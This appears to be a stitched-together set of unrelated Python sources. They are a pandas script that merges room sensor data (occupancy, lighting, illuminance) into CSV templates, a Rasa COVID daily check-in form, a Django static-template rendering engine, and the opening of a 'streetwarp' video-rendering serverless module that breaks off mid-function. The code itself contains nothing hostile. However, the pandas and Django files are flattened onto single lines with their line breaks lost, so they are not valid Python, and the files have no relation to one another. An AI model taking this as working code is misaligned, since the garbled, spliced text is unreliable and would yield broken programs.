pd.to_datetime(data_1['Date_Time'], format="%Y-%m-%d %H:%M:%S") print('Finished processing data 1') # data 2 # loop through the rows and compare the hours, assign the dates date_index = 0 for index in range(data_2.shape[0]-1): data_2.loc[index, 'Date'] = date_list_2[date_index].date() if (data_2.loc[index, 'Hour'] == 23) and (data_2.loc[index + 1, 'Hour'] == 0): date_index += 1 data_2.loc[index + 1, 'Date'] = date_list_2[date_index].date() else: data_2.loc[index + 1, 'Date'] = 
date_list_2[date_index].date() # create Date_Time column based on Date and Time data_2['Date_Time'] = data_2['Date'].astype(str) + ' ' + data_2['Time'].astype(str) data_2['Date_Time'] = pd.to_datetime(data_2['Date_Time'], format="%Y-%m-%d %H:%M:%S") print('Finished processing data 2') # data 3 # loop through the rows and compare the hours, assign the dates date_index = 0 for index in range(data_3.shape[0]-1): data_3.loc[index, 'Date'] = date_list_3[date_index].date() if (data_3.loc[index, 'Hour'] == 23) and (data_3.loc[index + 1, 'Hour'] == 0): date_index += 1 data_3.loc[index + 1, 'Date'] = date_list_3[date_index].date() else: data_3.loc[index + 1, 'Date'] = date_list_3[date_index].date() # create Date_Time column based on Date and Time data_3['Date_Time'] = data_3['Date'].astype(str) + ' ' + data_3['Time'].astype(str) data_3['Date_Time'] = pd.to_datetime(data_3['Date_Time'], format="%Y-%m-%d %H:%M:%S") print('Finished processing data 3') # data 4 # loop through the rows and compare the hours, assign the dates date_index = 0 for index in range(data_4.shape[0]-1): data_4.loc[index, 'Date'] = date_list_4[date_index].date() if (data_4.loc[index, 'Hour'] == 23) and (data_4.loc[index + 1, 'Hour'] == 0): date_index += 1 data_4.loc[index + 1, 'Date'] = date_list_4[date_index].date() else: data_4.loc[index + 1, 'Date'] = date_list_4[date_index].date() # create Date_Time column based on Date and Time data_4['Date_Time'] = data_4['Date'].astype(str) + ' ' + data_4['Time'].astype(str) data_4['Date_Time'] = pd.to_datetime(data_4['Date_Time'], format="%Y-%m-%d %H:%M:%S") print('Finished processing data 4') # data 5 # loop through the rows and compare the hours, assign the dates date_index = 0 for index in range(data_5.shape[0]-1): data_5.loc[index, 'Date'] = date_list_5[date_index].date() if (data_5.loc[index, 'Hour'] == 23) and (data_5.loc[index + 1, 'Hour'] == 0): date_index += 1 data_5.loc[index + 1, 'Date'] = date_list_5[date_index].date() else: data_5.loc[index + 1, 
'Date'] = date_list_5[date_index].date() # create Date_Time column based on Date and Time data_5['Date_Time'] = data_5['Date'].astype(str) + ' ' + data_5['Time'].astype(str) data_5['Date_Time'] = pd.to_datetime(data_5['Date_Time'], format="%Y-%m-%d %H:%M:%S") print('Finished processing data 5') print(f'Total running time: {datetime.datetime.now() - begin_time}') # assign Room_ID, Building_ID, etc data_1['Room_ID'] = 1 data_1['Building_ID'] = 1 data_2['Room_ID'] = 2 data_2['Building_ID'] = 1 data_3['Room_ID'] = 3 data_3['Building_ID'] = 1 data_4['Room_ID'] = 4 data_4['Building_ID'] = 1 data_5['Room_ID'] = 5 data_5['Building_ID'] = 1 # concat data based on the columns in the templates occ_temp_df = template_occupancy # temperate dataframe light_temp_df = template_light # temperate dataframe indoor_temp_df = template_indoor # temperate dataframe ''' data_1 ''' # data_1, first extract useful columns from processed data, then store them into template occ_df = pd.concat([occ_temp_df, data_1], join='inner', ignore_index=True) # only contains same columns, first column was dropped light_df = pd.concat([light_temp_df, data_1], join='inner', ignore_index=True) indoor_df = pd.concat([indoor_temp_df, data_1], join='inner', ignore_index=True) template_occupancy = pd.concat([template_occupancy, occ_df], ignore_index=True) # concat to the template template_light = pd.concat([template_light, light_df], ignore_index=True) template_indoor = pd.concat([template_indoor, indoor_df], ignore_index=True) ''' data_2 ''' # data_2, first extract useful columns from processed data, then store them into template occ_df = pd.concat([occ_temp_df, data_2], join='inner', ignore_index=True) # only contains same columns, first column was dropped light_df = pd.concat([light_temp_df, data_2], join='inner', ignore_index=True) indoor_df = pd.concat([indoor_temp_df, data_2], join='inner', ignore_index=True) template_occupancy = pd.concat([template_occupancy, occ_df], ignore_index=True) # concat to the 
template template_light = pd.concat([template_light, light_df], ignore_index=True) template_indoor = pd.concat([template_indoor, indoor_df], ignore_index=True) ''' data_3 ''' # data_3, first extract useful columns from processed data, then store them into template occ_df = pd.concat([occ_temp_df, data_3], join='inner', ignore_index=True) # only contains same columns, first column was dropped light_df = pd.concat([light_temp_df, data_3], join='inner', ignore_index=True) indoor_df = pd.concat([indoor_temp_df, data_3], join='inner', ignore_index=True) template_occupancy = pd.concat([template_occupancy, occ_df], ignore_index=True) # concat to the template template_light = pd.concat([template_light, light_df], ignore_index=True) template_indoor = pd.concat([template_indoor, indoor_df], ignore_index=True) ''' data_4 ''' # data_4, first extract useful columns from processed data, then store them into template occ_df = pd.concat([occ_temp_df, data_4], join='inner', ignore_index=True) # only contains same columns, first column was dropped light_df = pd.concat([light_temp_df, data_4], join='inner', ignore_index=True) indoor_df = pd.concat([indoor_temp_df, data_4], join='inner', ignore_index=True) template_occupancy = pd.concat([template_occupancy, occ_df], ignore_index=True) # concat to the template template_light = pd.concat([template_light, light_df], ignore_index=True) template_indoor = pd.concat([template_indoor, indoor_df], ignore_index=True) ''' data_5 ''' # data_5, first extract useful columns from processed data, then store them into template occ_df = pd.concat([occ_temp_df, data_5], join='inner', ignore_index=True) # only contains same columns, first column was dropped light_df = pd.concat([light_temp_df, data_5], join='inner', ignore_index=True) indoor_df = pd.concat([indoor_temp_df, data_5], join='inner', ignore_index=True) template_occupancy = pd.concat([template_occupancy, occ_df], ignore_index=True) # concat to the template template_light = 
pd.concat([template_light, light_df], ignore_index=True) template_indoor = pd.concat([template_indoor, indoor_df], ignore_index=True) # check dataframes print(template_occupancy.columns) print(template_light.columns) print(template_indoor.columns) print(template_occupancy.isnull().sum()) print(template_light.isnull().sum()) print(template_indoor.isnull().sum()) template_light['Lighting_Zone_ID'] = 1 print(template_occupancy.dtypes) print(template_light.dtypes) print(template_indoor.dtypes) # assign data types # using apply method template_occupancy[['Occupancy_Measurement', 'Room_ID', 'Building_ID']] \ = template_occupancy[['Occupancy_Measurement', 'Room_ID', 'Building_ID']].apply(pd.to_numeric) template_light[['Ligthing_Status', 'Room_ID', 'Building_ID']] \ = template_light[['Ligthing_Status', 'Room_ID', 'Building_ID']].apply(pd.to_numeric) template_indoor[['Indoor_Illuminance', 'Room_ID', 'Building_ID']] \ = template_indoor[['Indoor_Illuminance', 'Room_ID', 'Building_ID']].apply(pd.to_numeric) # save data template_occupancy.to_csv(save_path + 'Occupancy_Measurement.csv', index=False) template_light.to_csv(save_path + 'Ligthing_Status.csv', index=False) template_indoor.to_csv(save_path + 'Indoor_Measurement.csv', index=False)
# Daily check-in form for users who reported feeling BETTER than the
# previous assessment: re-checks the core symptoms and downgrades the
# stored symptom severity where appropriate.
from typing import Any, Dict, List, Optional, Text, Union

from rasa_sdk import Tracker
from rasa_sdk.events import EventType, SlotSet
from rasa_sdk.executor import CollectingDispatcher
from rasa_sdk.forms import REQUESTED_SLOT, FormAction

from covidflow.constants import (
    FEEL_WORSE_SLOT,
    HAS_COUGH_SLOT,
    HAS_DIFF_BREATHING_SLOT,
    HAS_FEVER_SLOT,
    LAST_SYMPTOMS_SLOT,
    SYMPTOMS_SLOT,
    Symptoms,
)

from .daily_ci_assessment_common import submit_daily_ci_assessment
from .form_helper import request_next_slot, validate_boolean_slot, yes_no_nlu_mapping
from .lib.log_util import bind_logger

FORM_NAME = "daily_ci_feel_better_form"

# form-local slot names (prefixed to avoid clashes with other daily-ci forms)
HAS_OTHER_MILD_SYMPTOMS_SLOT = "daily_ci__feel_better__has_other_mild_symptoms"
IS_SYMPTOM_FREE_SLOT = "daily_ci__feel_better__is_symptom_free"


class DailyCiFeelBetterForm(FormAction):
    """Form asking fever/cough (+ breathing for moderate cases) and, for
    mild cases, other-mild-symptoms / symptom-free follow-ups."""

    def name(self) -> Text:
        return FORM_NAME

    async def run(
        self, dispatcher, tracker, domain,
    ):
        # bind structured-logging context before the base class drives the form
        bind_logger(tracker)
        return await super().run(dispatcher, tracker, domain)

    ## override to play initial message and set feel_worse slot
    async def _activate_if_required(
        self,
        dispatcher: "CollectingDispatcher",
        tracker: "Tracker",
        domain: Dict[Text, Any],
    ) -> List[EventType]:
        events = []
        # only on first activation (not on every form turn)
        if tracker.active_form.get("name") != FORM_NAME:
            dispatcher.utter_message(
                template="utter_daily_ci__feel_better__acknowledge"
            )
            # user chose the "feel better" path, so feel_worse is False
            events.append(SlotSet(FEEL_WORSE_SLOT, False))

        return await super()._activate_if_required(dispatcher, tracker, domain) + events

    @staticmethod
    def required_slots(tracker: Tracker) -> List[Text]:
        """A list of required slots that the form has to fill"""
        slots = [HAS_FEVER_SLOT, HAS_COUGH_SLOT]

        last_symptoms = tracker.get_slot(LAST_SYMPTOMS_SLOT)

        # breathing question only applies when the last assessment was moderate
        if last_symptoms == Symptoms.MODERATE:
            slots.append(HAS_DIFF_BREATHING_SLOT)

            # still having breathing difficulty -> no further questions needed
            if tracker.get_slot(HAS_DIFF_BREATHING_SLOT) is True:
                return slots

        slots.append(HAS_OTHER_MILD_SYMPTOMS_SLOT)

        # any remaining symptom short-circuits the symptom-free question
        if (
            tracker.get_slot(HAS_OTHER_MILD_SYMPTOMS_SLOT) is True
            or tracker.get_slot(HAS_FEVER_SLOT) is True
            or tracker.get_slot(HAS_COUGH_SLOT) is True
        ):
            return slots

        return slots + [IS_SYMPTOM_FREE_SLOT]

    def slot_mappings(self) -> Dict[Text, Union[Dict, List[Dict]]]:
        # every slot is a yes/no answer parsed by the shared NLU mapping
        return {
            HAS_FEVER_SLOT: yes_no_nlu_mapping(self),
            HAS_COUGH_SLOT: yes_no_nlu_mapping(self),
            HAS_DIFF_BREATHING_SLOT: yes_no_nlu_mapping(self),
            HAS_OTHER_MILD_SYMPTOMS_SLOT: yes_no_nlu_mapping(self),
            IS_SYMPTOM_FREE_SLOT: yes_no_nlu_mapping(self),
        }

    def request_next_slot(
        self,
        dispatcher: CollectingDispatcher,
        tracker: Tracker,
        domain: Dict[Text, Any],
    ) -> Optional[List[EventType]]:
        # delegate to the shared helper, supplying our template-name logic
        return request_next_slot(
            self, dispatcher, tracker, domain, self._utter_ask_slot_template
        )

    def _utter_ask_slot_template(self, slot: str, tracker: Tracker) -> Optional[str]:
        """Pick the ask template for `slot`; None means use the default.

        When the slot being re-requested equals REQUESTED_SLOT the user
        gave an unparseable answer, so the *_error variant is used.
        """
        if slot in [HAS_FEVER_SLOT, HAS_COUGH_SLOT, HAS_DIFF_BREATHING_SLOT]:
            if tracker.get_slot(REQUESTED_SLOT) == slot:
                return f"utter_ask_daily_ci__feel_better__{slot}_error"
            return f"utter_ask_daily_ci__feel_better__{slot}"

        # first ask of the other-mild-symptoms question after the moderate
        # branch gets an acknowledging variant
        if (
            slot == HAS_OTHER_MILD_SYMPTOMS_SLOT
            and tracker.get_slot(LAST_SYMPTOMS_SLOT) == Symptoms.MODERATE
            and tracker.get_slot(REQUESTED_SLOT) != slot
        ):
            return f"utter_ask_{slot}_with_acknowledge"

        return None

    @validate_boolean_slot
    def validate_has_fever(
        self,
        value: Union[bool, Text],
        dispatcher: CollectingDispatcher,
        tracker: Tracker,
        domain: Dict[Text, Any],
    ) -> Dict[Text, Any]:
        # side effect only: utter care advice depending on the answer
        if value is True:
            dispatcher.utter_message(template="utter_daily_ci__acknowledge_fever")
            dispatcher.utter_message(template="utter_daily_ci__take_acetaminophen")
            dispatcher.utter_message(template="utter_daily_ci__avoid_ibuprofen")
        else:
            dispatcher.utter_message(
                template="utter_daily_ci__feel_better__acknowledge_no_fever"
            )

        return {HAS_FEVER_SLOT: value}

    @validate_boolean_slot
    def validate_has_cough(
        self,
        value: Union[bool, Text],
        dispatcher: CollectingDispatcher,
        tracker: Tracker,
        domain: Dict[Text, Any],
    ) -> Dict[Text, Any]:
        # side effect only: utter care advice depending on the answer
        if value is True:
            dispatcher.utter_message(template="utter_daily_ci__cough_syrup_may_help")
            dispatcher.utter_message(template="utter_daily_ci__cough_syrup_pharmacist")
        else:
            dispatcher.utter_message(template="utter_daily_ci__acknowledge_no_cough")

        return {HAS_COUGH_SLOT: value}

    @validate_boolean_slot
    def validate_has_diff_breathing(
        self,
        value: Union[bool, Text],
        dispatcher: CollectingDispatcher,
        tracker: Tracker,
        domain: Dict[Text, Any],
    ) -> Dict[Text, Any]:
        slots = {HAS_DIFF_BREATHING_SLOT: value}

        if value is True:
            dispatcher.utter_message(
                template="utter_daily_ci__feel_better__breathing_difficulty_recommendation_1"
            )
            dispatcher.utter_message(
                template="utter_daily_ci__feel_better__breathing_difficulty_recommendation_2"
            )
        else:
            # breathing resolved: downgrade the overall severity to mild
            slots[SYMPTOMS_SLOT] = Symptoms.MILD

        return slots

    @validate_boolean_slot
    def validate_daily_ci__feel_better__has_other_mild_symptoms(
        self,
        value: Text,
        dispatcher: CollectingDispatcher,
        tracker: Tracker,
        domain: Dict[Text, Any],
    ) -> Dict[Text, Any]:
        # recommendation applies if ANY mild symptom remains (this answer,
        # fever or cough)
        if (
            value is True
            or tracker.get_slot(HAS_FEVER_SLOT) is True
            or tracker.get_slot(HAS_COUGH_SLOT) is True
        ):
            dispatcher.utter_message(
                template="utter_daily_ci__feel_better__has_other_mild_symptoms_recommendation"
            )

        return {HAS_OTHER_MILD_SYMPTOMS_SLOT: value}

    @validate_boolean_slot
    def validate_daily_ci__feel_better__is_symptom_free(
        self,
        value: Text,
        dispatcher: CollectingDispatcher,
        tracker: Tracker,
        domain: Dict[Text, Any],
    ) -> Dict[Text, Any]:
        slots = {IS_SYMPTOM_FREE_SLOT: value}

        if value is True:
            # fully recovered: clear the stored symptom severity
            slots[SYMPTOMS_SLOT] = Symptoms.NONE
        else:
            dispatcher.utter_message(
                template="utter_daily_ci__feel_better__has_other_mild_symptoms_still_sick_recommendation"
            )

        return slots

    def submit(
        self,
        dispatcher: CollectingDispatcher,
        tracker: Tracker,
        domain: Dict[Text, Any],
    ) -> List[Dict]:
        # persistence and follow-up scheduling handled by the shared helper
        return submit_daily_ci_assessment(tracker)
<reponame>bckohan/django-static-templates<filename>render_static/engine.py # pylint: disable=C0114 import os from collections import Counter, namedtuple from pathlib import Path from typing import Callable, Dict, Generator, List, Optional, Union from django.conf import settings from django.core.exceptions import ImproperlyConfigured from django.template.backends.django import Template as DjangoTemplate from django.template.exceptions import TemplateDoesNotExist from django.template.utils import InvalidTemplateEngineError from django.utils.functional import cached_property from django.utils.module_loading import import_string from render_static import Jinja2DependencyNeeded from render_static.backends import StaticDjangoTemplates, StaticJinja2Templates from render_static.context import resolve_context from render_static.exceptions import InvalidContext try: # pylint: disable=C0412 from django.template.backends.jinja2 import Template as Jinja2Template except ImportError: # pragma: no cover Jinja2Template = Jinja2DependencyNeeded __all__ = ['StaticTemplateEngine', 'Render'] class Render(namedtuple('_Render', ['selector', 'config', 'template', 'destination'])): """ A named tuple that holds all the pertinent information for a template including: - The selector used to select it - Its configuration from settings, if any - Its template engine Template class - could be a Django or Jinja2 template - The destination where it will be/was rendered """ def __str__(self) -> str: app = getattr(self.template.origin, 'app', None) if app: return f'[{app.label}] {self.template.origin.template_name} -> {self.destination}' return f'{self.template.origin.template_name} -> {self.destination}' def _resolve_context( context: Optional[Union[Dict, Callable, str, Path]], template: Optional[str] = None ) -> Dict: """ Resolve a context configuration parameter into a context dictionary. 
If the context is a string it is treated as an importable string pointing to a callable, if it is a callable it is called and if it is a dictionary it is simply returned. Any failure to resolve a dictionary from the configuration. :param context: Either an importable string pointing to a callable, a callable instance or a dictionary :return: dictionary holding the context :raises ImproperlyConfigured: if there is a failure to produce a dictionary context """ try: return resolve_context(context) except InvalidContext as inval_ctx: raise ImproperlyConfigured( f"STATIC_TEMPLATES 'context' configuration directive" f"{' for ' + template if template else '' } must be a dictionary or a " f"callable that returns a dictionary!" ) from inval_ctx class StaticTemplateEngine: """ An engine for rendering static templates to disk based on a standard ``STATIC_TEMPLATES`` configuration either passed in at construction or obtained from settings. Static templates are most usually generated by a run of :ref:`renderstatic` preceding `collectstatic`, but this class encapsulates all the behavior of the static engine, may be used independently and can override configured parameters including contexts and render destinations: .. 
code-block:: from render_static.engine import StaticTemplateEngine from django.conf import settings from pathlib import Path engine = StaticTemplateEngine() # This engine uses the settings.STATIC_TEMPLATE config engine = StaticTemplateEngine({ # This engine uses a custom configuration 'ENGINES': [{ 'BACKEND': 'render_static.backends.StaticJinja2Templates', 'APP_DIRS': True }], 'context': { 'var1': 'value1' }, 'templates': { 'app/html/my_template.html': { 'context': { 'var1': 'value2' } } } }) # this will render the my_template.html template to app/static/app/html/my_template.html # with the context { 'settings': settings, 'var1': 'value2' } engine.render_to_disk('app/html/my_template.html') # using the engine directly we can override configuration directives, this will render # the template with the context { 'settings': settings, 'var1': 'value3' } @ # the custom location 'static_dir/rendered.html' engine.render_to_disk( 'app/html/my_template.html', context={'var1': 'value3'}, destination=Path(settings.BASE_DIR) / 'static_dir/rendered.html' ) :param config: If provided use this configuration instead of the one from settings :raises ImproperlyConfigured: If there are any errors in the configuration passed in or specified in settings. """ config_: Dict = {} DEFAULT_ENGINE_CONFIG = [{ 'BACKEND': 'render_static.backends.StaticDjangoTemplates', 'OPTIONS': { 'loaders': ['render_static.loaders.StaticAppDirectoriesBatchLoader'], 'builtins': ['render_static.templatetags.render_static'] }, }] class TemplateConfig: """ Container for template specific configuration parameters. :param name: The name of the template :param dest: The absolute destination directory where the template will be written. 
May be None which indicates the template will be written to its owning app's static directory if it was loaded with an app directory loader :param context: A specific dictionary context to use for this template, may also be an import string to a callable or a callable that generates a dictionary. This may override global context parameters. :raises ImproperlyConfigured: If there are any unexpected or misconfigured parameters """ context_: Dict = {} dest_: Optional[Path] = None def __init__( self, name: str, dest: Optional[Union[Path, str]] = None, context: Optional[Union[Dict, Callable, str]] = None ) -> None: self.name = name if dest is not None: if not isinstance(dest, (str, Path)): raise ImproperlyConfigured( f"Template {name} 'dest' parameter in STATIC_TEMPLATES must be a string or " f"path-like object, not {type(dest)}" ) self.dest_ = Path(dest) if not self.dest_.is_absolute(): raise ImproperlyConfigured( f'In STATIC_TEMPLATES, template {name} dest must be absolute!' ) context = _resolve_context(context, template=name) if context: self.context_ = context @property def context(self) -> Dict: """ The context specific to this template. This will not include global parameters only the context as specified in the template configuration. """ return self.context_ @property def dest(self) -> Optional[Path]: """ The location this template should be saved to, if specified. """ return self.dest_ def __init__(self, config: Optional[Dict] = None) -> None: if config: self.config_ = config @cached_property def config(self) -> dict: """ Lazy configuration property. Fetch the ``STATIC_TEMPLATES`` configuration dictionary which will either be the configuration passed in on initialization or the config specified in the ``STATIC_TEMPLATES`` setting. 
:return: The ``STATIC_TEMPLATES`` configuration this engine has initialized from :raises ImproperlyConfigured: If there are any terminal errors with the configurations """ if not self.config_: if not hasattr(settings, 'STATIC_TEMPLATES'): raise ImproperlyConfigured( 'No STATIC_TEMPLATES configuration directive in settings!' ) self.config_ = settings.STATIC_TEMPLATES if settings.STATIC_TEMPLATES is not None else { } unrecognized_keys = [ key for key in self.config_.keys() if key not in ['ENGINES', 'templates', 'context'] ] if unrecognized_keys: raise ImproperlyConfigured( f'Unrecognized STATIC_TEMPLATES configuration directives: {unrecognized_keys}' ) return self.config_ @cached_property def context(self) -> dict: """ Lazy context property. Fetch the global context that will be fed to all templates. This includes the settings object and anything listed in the context dictionary in the ``STATIC_TEMPLATES`` configuration. :return: A dictionary containing the global template context :raises ImproperlyConfigured: If the template context is specified and is not a dictionary. """ return { 'settings': settings, **_resolve_context(self.config.get('context', {})) } @cached_property def templates(self) -> dict: """ Lazy template property Fetch the dictionary mapping template names to TemplateConfig objects initializing them if necessary. :return: A dictionary mapping template names to configurations :raise ImproperlyConfigured: If there are any configuration issues with the templates """ try: templates = { name: StaticTemplateEngine.TemplateConfig(name=name, **config) for name, config in self.config.get('templates', {}).items() } except ImproperlyConfigured: raise except Exception as exp: raise ImproperlyConfigured(f"Invalid 'templates' in STATIC_TEMPLATE: {exp}!") from exp return templates @cached_property def engines(self) -> dict: """ Lazy engines property. 
Fetch the dictionary of engine names to engine instances based on the configuration, initializing said entities if necessary. :return: A dictionary mapping engine names to instances :raise ImproperlyConfigured: If there are configuration problems with the engine backends. """ engine_defs = self.config.get('ENGINES', None) if engine_defs is None: self.config['ENGINES'] = self.DEFAULT_ENGINE_CONFIG elif not hasattr(engine_defs, '__iter__'): raise ImproperlyConfigured( f'ENGINES in STATIC_TEMPLATES setting must be an iterable containing engine ' f'configurations! Encountered: {type(engine_defs)}' ) engines = {} backend_names = [] for backend in self.config.get('ENGINES', []): try: # This will raise an exception if 'BACKEND' doesn't exist or # isn't a string containing at least one dot. default_name = backend['BACKEND'].rsplit('.', 2)[-1] except Exception as exp: invalid_backend = backend.get('BACKEND', '<not defined>') raise ImproperlyConfigured( f'Invalid BACKEND for a static template engine: {invalid_backend}. Check ' f'your STATIC_TEMPLATES setting.' ) from exp # set defaults backend = { 'NAME': default_name, 'DIRS': [], 'APP_DIRS': False, 'OPTIONS': {}, **backend, } engines[backend['NAME']] = backend backend_names.append(backend['NAME']) counts = Counter(backend_names) duplicates = [alias for alias, count in counts.most_common() if count > 1] if duplicates: raise ImproperlyConfigured( f"Template engine aliases are not unique, duplicates: {', '.join(duplicates)}. " f"Set a unique NAME for each engine in settings.STATIC_TEMPLATES." ) for alias, config in engines.items(): params = config.copy() backend = params.pop('BACKEND') engines[alias] = import_string(backend)(params) return engines def __getitem__(self, alias: str) -> Union[StaticDjangoTemplates, StaticJinja2Templates]: """ Accessor for backend instances indexed by name. 
:param alias: The name of the backend to fetch :return: The backend instance :raises InvalidTemplateEngineError: If a backend of the given alias does not exist """ try: return self.engines[alias] except KeyError as key_error: raise InvalidTemplateEngineError( f"Could not find config for '{alias}' " f"in settings.STATIC_TEMPLATES" ) from key_error def __iter__(self): """ Iterate through the backends. """ return iter(self.engines) def all(self) -> List[Union[StaticDjangoTemplates, StaticJinja2Templates]]: """ Get a list of all registered engines in order of precedence. :return: A list of engine instances in order of precedence """ return [self[alias] for alias in self] @staticmethod def resolve_destination( config: TemplateConfig, template: Union[Jinja2Template, DjangoTemplate], batch: bool, dest: Optional[Union[str, Path]] = None ) -> Path: """ Resolve the destination for a template, given all present configuration parameters for it and arguments passed in. :param config: The template configuration :param template: The template object created by the backend, could be a Jinja2 or Django template :param batch: True if this is part of a batch render, false otherwise :param dest: The destination passed in from the command line :return: An absolute destination path :raises ImproperlyConfigured: if a render destination cannot be determined """ app = getattr(template.origin, 'app', None) if dest is None: dest = config.dest if dest is None: if app: dest = Path(app.path) / 'static' else: try: dest = Path(settings.STATIC_ROOT) except (AttributeError, TypeError) as err: raise ImproperlyConfigured( f"Template {template.template.name} must either be configured with a 'dest'" f"or STATIC_ROOT must be defined in settings, because it was not loaded " f"from an app!" 
) from err dest /= template.template.name elif batch or Path(dest).is_dir(): dest /= template.template.name os.makedirs(str(Path(dest if dest else '').parent), exist_ok=True) return Path(dest if dest else '') def render_to_disk( # pylint: disable=R0913 self, selector: str, context: Optional[Dict] = None, dest: Optional[Union[str, Path]] = None, first_engine: bool = False, first_loader: bool = False, first_preference: bool = False ) -> List[Render]: """ Wrap render_each generator function and return the whole list of rendered templates for the given selector. :param selector: The name of the template to render to disk :param context: Additional context parameters that will override configured context parameters :param dest: Override the configured path to render the template at this path, either a string path, or Path like object. If the selector resolves to multiple templates, dest will be considered a directory. If the the selector resolves to a single template, dest will be considered the final file path, unless it already exists as a directory. :param first_engine: If true, render only the set of template names that match the selector that are found by the first rendering engine. By default (False) any templates that match the selector from any engine will be rendered. :param first_loader: If True, render only the set of template names from the first loader that matches any part of the selector. By default (False) any template name that matches the selector from any loader will be rendered. :param first_preference: If true, render only the templates that match the first preference for each loader. When combined with first_loader will render only the first preference(s) of the first loader. Preferences are loader specific and documented on the loader. 
:return: Render object for all the template(s) rendered to disk :raises TemplateDoesNotExist: if no template by the given name is found :raises ImproperlyConfigured: if not enough information was given to render and write the template """ return [ # pylint: disable=R1721 render for render in self.render_each( selector, context=context, dest=dest, first_engine=first_engine, first_loader=first_loader, first_preference=first_preference ) ] def render_each( # pylint: disable=R0914 self, *selectors: str, context: Optional[Dict] = None, dest: Optional[Union[str, Path]] = None, first_engine: bool = False, first_loader: bool = False, first_preference: bool = False ) -> Generator[Render, None, None]: """ A generator function that renders all selected templates of the highest precedence for each matching template name to disk. The location of the directory of the rendered template will either be based on the `dest` configuration parameter for the template or the app the template was found in. :param selectors: The name(s) of the template(s) to render to disk :param context: Additional context parameters that will override configured context parameters :param dest: Override the configured path to render the template at this path, either a string path, or Path like object. If the selector(s) resolve to multiple templates, dest will be considered a directory. If the the selector(s) resolve to a single template, dest will be considered the final file path, unless it already exists as a directory. :param first_engine: If true, render only the set of template names that match the selector that are found by the first rendering engine. By default (False) any templates that match the selector from any engine will be rendered. :param first_loader: If True, render only the set of template names from the first loader that matches any part of the selector. By default (False) any template name that matches the selector from any loader will be rendered. 
:param first_preference: If true, render only the templates that match the first preference for each loader. When combined with first_loader will render only the first preference(s) of the first loader. Preferences are loader specific and documented on the loader. :yield: Render objects for each template to disk :raises TemplateDoesNotExist: if no template by the given name is found :raises ImproperlyConfigured: if not enough information was given to render and write the template """ if context: context = resolve_context(context) renders = [] # all jobs are considered part of a batch if dest is provided and more than one selector # is provided batch = len(selectors) > 1 and dest for selector in selectors: config = self.templates.get( selector, StaticTemplateEngine.TemplateConfig(name=selector) ) templates: Dict[str, Union[DjangoTemplate, Jinja2Template]] = {} chain = [] for engine in self.all(): try: for template_name in engine.select_templates( selector, first_loader=first_loader, first_preference=first_preference ): try: templates.setdefault(template_name, engine.get_template(template_name)) except TemplateDoesNotExist as tdne: # pragma: no cover # this should be impossible w/o a loader bug! 
if len(templates): raise RuntimeError( f'Selector resolved to template {template_name} which is ' f'not loadable: {tdne}' ) from tdne if first_engine and templates: break except TemplateDoesNotExist as tdne: chain.append(tdne) continue if not templates: raise TemplateDoesNotExist(selector, chain=chain) for name, template in templates.items(): # pylint: disable=W0612 renders.append( Render( selector=selector, config=config, template=template, destination=self.resolve_destination( config, template, # each selector is a batch if it resolves to more than one template bool(batch or len(templates) > 1), dest ) ) ) for render in renders: ctx = render.config.context.copy() if context is not None: ctx.update(context) with open(str(render.destination), 'w', encoding='UTF-8') as temp_out: temp_out.write( render.template.render({ **self.context, **ctx }) ) yield render
# Serverless entry points for "streetwarp": render street-view hyperlapse
# videos, join previously rendered segments, stream progress over a
# websocket, and optionally upload results to Azure blob storage.
try:
    # Only present inside the packaged serverless bundle; absence is fine locally.
    import unzip_requirements
except ImportError:
    pass

import asyncio
import json
import os
import shutil
import subprocess
import sys
import uuid
from asyncio import create_subprocess_exec
from asyncio.subprocess import PIPE
from contextlib import contextmanager
from functools import wraps
from tempfile import mkdtemp
from time import monotonic

import aiohttp
import websockets as ws
from azure.storage.blob import BlobServiceClient

dirname = os.path.abspath(os.path.dirname(__file__))


def r(p):
    """Resolve slash-separated path *p* relative to this module's directory."""
    return os.path.join(dirname, *p.split("/"))


bin_path = r("res/bin")
sw_path = r("res/bin/streetwarp")

blob_connection_env = "AZURE_STORAGE_CONNECTION_STRING"
# Uploads are optional: the client exists only when the connection string is set.
blob_service_client = (
    BlobServiceClient.from_connection_string(os.getenv(blob_connection_env))
    if blob_connection_env in os.environ
    else None
)

# Expose the bundled native libraries to the path-optimizer subprocess.
ld_path = os.path.join(sw_path, "path_optimizer", "dist", "lib64")
if "LD_LIBRARY_PATH" in os.environ:
    os.environ["LD_LIBRARY_PATH"] += os.path.pathsep + ld_path
else:
    os.environ["LD_LIBRARY_PATH"] = ld_path


def timer(msg):
    """Decorator factory: time the wrapped function (sync or async).

    Prints ``"<msg>: <elapsed>ms"`` on success; on failure prints the error
    to stderr and re-raises it unchanged.
    """

    @contextmanager
    def wrapper():
        start = monotonic()
        yield
        print(f"{msg}: {(monotonic()-start)*1000:.3f}ms")

    def with_func(func):
        if asyncio.iscoroutinefunction(func):

            @wraps(func)
            async def t_async(*args, **kwargs):
                with wrapper():
                    try:
                        return await func(*args, **kwargs)
                    except Exception as e:
                        print(f"{msg} failed with {str(e)}.", file=sys.stderr)
                        raise e

            return t_async

        @wraps(func)
        def t(*args, **kwargs):
            with wrapper():
                try:
                    return func(*args, **kwargs)
                except Exception as e:
                    print(f"{msg} failed with {str(e)}.", file=sys.stderr)
                    raise e

        return t

    return with_func


@timer("prepare input")
def prepare_input(key, contents, extension):
    """Write *contents* to a temp file named ``<key>.<extension>``.

    Also appends the bundled binary directories to PATH so the
    ``streetwarp`` executable can be spawned later.  Returns the input path.
    """
    os.environ["PATH"] += os.pathsep + bin_path
    os.environ["PATH"] += os.pathsep + sw_path
    dest = mkdtemp()
    inp = os.path.join(dest, f"{key}.{extension}")
    with open(inp, "w") as f:
        f.write(contents)
    return inp


# https://stackoverflow.com/a/53323746
async def _read_stream(stream, callback):
    """Forward decoded, stripped lines from *stream* to *callback* until EOF."""
    while True:
        line = await stream.readline()
        if line:
            callback(line.decode("utf-8").strip())
        else:
            break


async def run(command, args, out_callback, err_callback):
    """Run *command*, streaming stdout/stderr lines to the callbacks.

    :return: the process exit code.
    """
    process = await create_subprocess_exec(
        command, *args, stdout=PIPE, stderr=PIPE, limit=1000 * 1000 * 10  # 10 MB
    )
    # asyncio.wait() no longer accepts bare coroutines (deprecated in 3.8,
    # TypeError on 3.11+); gather is the supported way to drain both pipes.
    await asyncio.gather(
        _read_stream(process.stdout, out_callback),
        _read_stream(process.stderr, err_callback),
    )
    return await process.wait()


@timer("prepare output")
def prepare_output(key):
    """Create a temp output directory; return ``(out_dir, out_mp4_path)``."""
    out_dir = mkdtemp()
